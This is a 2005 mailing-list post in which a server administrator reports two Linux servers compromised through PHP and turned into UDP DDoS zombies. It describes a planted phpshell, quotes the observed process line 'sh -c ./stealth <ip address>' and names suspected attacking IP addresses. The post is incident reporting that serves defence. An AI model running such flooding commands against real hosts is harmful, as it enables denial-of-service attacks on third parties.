I have also had two servers compromised in a similar manner. Both machines were running White Box Enterprise Linux 3.0 (RedHat EL clone, for those not familier), and both were up to date with all the latest patches (I update weekly, except for the kernel). On the first machine, about two or three weeks ago, I discovered a shell running a perl script out of /tmp which was a UDP DDoS zombie program. As far as I could tell, it got in through PHP somewhere, but I couldn't tell where for sure. It's possible it came in through a vulnerable phpBB2 installation, but I can not say for sure. The second machine, which has been the subject of DDoS attacking for the past week (about 40 megabits of inbound UDP traffic hitting the machine for around 30 to 40 minutes, at random periods), ended up being a DDoS zombie as well - sevearly effecting my systems by consuming all of my bandwidth. This one definately got in through php, as I found several php files containing a "phpshell" program which was obviously used to execute the shell commands which started a "sh -c ./stealth <ip address>" process which DOS'd the target host. However, I really have no idea /how/ this happened. I have also heard from other people 'round the net and IRC that this is happening to a lot of servers. Is this a security vulnerability in Apache2/PHP, or simply a case of an exploitable configuration that many people use? Some notes I've made on the situation, nearly all attacking hosts have been IP addresses that are assigned through RIPE (thus, are in europe) They appear to be compromised servers. One IP address making repeated requests for the now removed phpshell file is 83.103.184.208, also assigned through RIPE. Another odd thing was that 69.218.121.228 made quite a few requests of my server searching for things like "/forum", "/phpBB", "/bb" and the like, obviously looking for exploitable phpBB installations. I have no evidence to say such, but I think the attacks I was on the receiving end of, are the same type of attack that was being dished out. I have the UDP flooder script that was deposited in /tmp on the first server, but (oddly) I couldn't locate the "stealth" script on the second server. Try as I might, I could not locate a file by that name on the filesystem. On Sat, 2005-04-30 at 22:11, a.list.address@xxxxxxxxx wrote: > Looks like someone was trying to use your server as a DDoS zombie. > What kind of Perl or PHP scripts are on your server? Look in your > Apache access log for POST requests that may have uploaded one of > these files, or GET/POST requests that may have uploaded a URL to > download one of these files. See if you can figure out how it got on > your server. -- - Nick Bright Terraworld, Inc 888-332-1616 x315 http://home.terraworld.net
